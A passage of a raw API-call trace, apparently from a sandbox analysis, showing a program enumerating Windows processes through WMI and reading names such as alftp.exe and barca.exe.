[5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.864] IUnknown:QueryInterface (in: This=0x560d970, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560d974) returned 0x0 [0213.864] IMarshal:GetUnmarshalClass (in: This=0x560d974, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.864] IUnknown:Release (This=0x560d974) returned 0x3 [0213.864] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.864] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.864] IUnknown:QueryInterface (in: This=0x560d970, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.864] IUnknown:Release (This=0x560d970) returned 0x2 [0213.864] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.864] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.864] IUnknown:QueryInterface (in: This=0x560d970, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560d970) returned 0x0 [0213.864] IUnknown:AddRef (This=0x560d970) returned 0x4 [0213.864] IUnknown:Release (This=0x560d970) returned 0x3 [0213.864] IUnknown:Release (This=0x560d970) returned 0x2 [0213.864] CoTaskMemFree (pv=0x5612608) [0213.865] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.865] IUnknown:AddRef (This=0x560d970) returned 0x3 [0213.865] IWbemClassObject:Get (in: This=0x560d970, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.865] IWbemClassObject:Get (in: This=0x560d970, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2856\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.865] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2856\"") returned 0x66 [0213.865] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2856\"") returned 0x66 [0213.865] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.865] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.865] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.865] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.866] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612608) returned 0x0 [0213.866] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612608, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.866] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612608, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a200) returned 0x0 [0213.866] WbemDefPath:IUnknown:Release (This=0x5612608) returned 0x0 [0213.866] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a200, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a200) returned 0x0 [0213.866] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a200, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.867] WbemDefPath:IUnknown:AddRef (This=0x561a200) returned 0x3 [0213.867] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a200, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.867] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a200, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.867] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a200, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612618) returned 0x0 [0213.867] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612618, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.867] WbemDefPath:IUnknown:Release (This=0x5612618) returned 0x3 [0213.867] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.867] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.867] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a200, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.867] WbemDefPath:IUnknown:Release (This=0x561a200) returned 0x2 [0213.867] WbemDefPath:IUnknown:Release (This=0x561a200) returned 0x1 [0213.867] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.867] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.867] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a200, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a200) returned 0x0 [0213.867] WbemDefPath:IUnknown:AddRef (This=0x561a200) returned 0x3 [0213.867] WbemDefPath:IUnknown:Release (This=0x561a200) returned 0x2 [0213.867] WbemDefPath:IWbemPath:SetText (This=0x561a200, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2856\"") returned 0x0 [0213.867] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.867] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.867] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.867] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.868] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.868] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.868] IWbemClassObject:Get (in: This=0x560d970, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2688108*=0, plFlavor=0x268810c*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="alftp.exe", varVal2=0x0), pType=0x2688108*=8, plFlavor=0x268810c*=0) returned 0x0 [0213.868] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0213.868] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0213.868] IWbemClassObject:Get (in: This=0x560d970, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2688108*=8, plFlavor=0x268810c*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="alftp.exe", varVal2=0x0), pType=0x2688108*=8, plFlavor=0x268810c*=0) returned 0x0 [0213.868] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0213.868] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0213.868] CoTaskMemAlloc (cb=0x4) returned 0x561bda8 [0213.868] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561bda8, puReturned=0x267acc0 | out: apObjects=0x561bda8*=0x560db08, puReturned=0x267acc0*=0x1) returned 0x0 [0213.869] IUnknown:QueryInterface (in: This=0x560db08, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560db08) returned 0x0 [0213.869] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.869] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.869] IUnknown:AddRef (This=0x560db08) returned 0x3 [0213.869] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.869] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.869] IUnknown:QueryInterface (in: This=0x560db08, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560db0c) returned 0x0 [0213.869] IMarshal:GetUnmarshalClass (in: This=0x560db0c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.869] IUnknown:Release (This=0x560db0c) returned 0x3 [0213.870] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.870] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.870] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.870] IUnknown:Release (This=0x560db08) returned 0x2 [0213.870] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.870] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.870] IUnknown:QueryInterface (in: This=0x560db08, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560db08) returned 0x0 [0213.870] IUnknown:AddRef (This=0x560db08) returned 0x4 [0213.870] IUnknown:Release (This=0x560db08) returned 0x3 [0213.870] IUnknown:Release (This=0x560db08) returned 0x2 [0213.870] CoTaskMemFree (pv=0x561bda8) [0213.870] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.870] IUnknown:AddRef (This=0x560db08) returned 0x3 [0213.870] IWbemClassObject:Get (in: This=0x560db08, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.871] IWbemClassObject:Get (in: This=0x560db08, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2864\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.871] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2864\"") returned 0x66 [0213.871] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2864\"") returned 0x66 [0213.871] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.871] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.871] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.871] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.872] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561bda8) returned 0x0 [0213.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x561bda8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.872] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561bda8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a2e0) returned 0x0 [0213.872] WbemDefPath:IUnknown:Release (This=0x561bda8) returned 0x0 [0213.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a2e0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a2e0) returned 0x0 [0213.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a2e0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.873] WbemDefPath:IUnknown:AddRef (This=0x561a2e0) returned 0x3 [0213.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a2e0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a2e0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a2e0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561bdb8) returned 0x0 [0213.873] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561bdb8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.873] WbemDefPath:IUnknown:Release (This=0x561bdb8) returned 0x3 [0213.873] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.873] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a2e0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.873] WbemDefPath:IUnknown:Release (This=0x561a2e0) returned 0x2 [0213.873] WbemDefPath:IUnknown:Release (This=0x561a2e0) returned 0x1 [0213.873] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.873] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a2e0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a2e0) returned 0x0 [0213.873] WbemDefPath:IUnknown:AddRef (This=0x561a2e0) returned 0x3 [0213.873] WbemDefPath:IUnknown:Release (This=0x561a2e0) returned 0x2 [0213.873] WbemDefPath:IWbemPath:SetText (This=0x561a2e0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2864\"") returned 0x0 [0213.873] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.873] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.875] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.875] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.875] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.875] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.875] IWbemClassObject:Get (in: This=0x560db08, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2688978*=0, plFlavor=0x268897c*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="barca.exe", varVal2=0x0), pType=0x2688978*=8, plFlavor=0x268897c*=0) returned 0x0 [0213.875] SysStringByteLen (bstr="barca.exe") returned 0x12 [0213.875] SysStringByteLen (bstr="barca.exe") returned 0x12 [0213.875] IWbemClassObject:Get (in: This=0x560db08, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2688978*=8, plFlavor=0x268897c*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="barca.exe", varVal2=0x0), pType=0x2688978*=8, plFlavor=0x268897c*=0) returned 0x0 [0213.875] SysStringByteLen (bstr="barca.exe") returned 0x12 [0213.875] SysStringByteLen (bstr="barca.exe") returned 0x12 [0213.875] CoTaskMemAlloc (cb=0x4) returned 0x561bde8 [0213.875] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561bde8, puReturned=0x267acc0 | out: apObjects=0x561bde8*=0x560dca0, puReturned=0x267acc0*=0x1) returned 0x0 [0213.876] IUnknown:QueryInterface (in: This=0x560dca0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560dca0) returned 0x0 [0213.876] IUnknown:QueryInterface (in: This=0x560dca0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.876] IUnknown:QueryInterface (in: This=0x560dca0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, 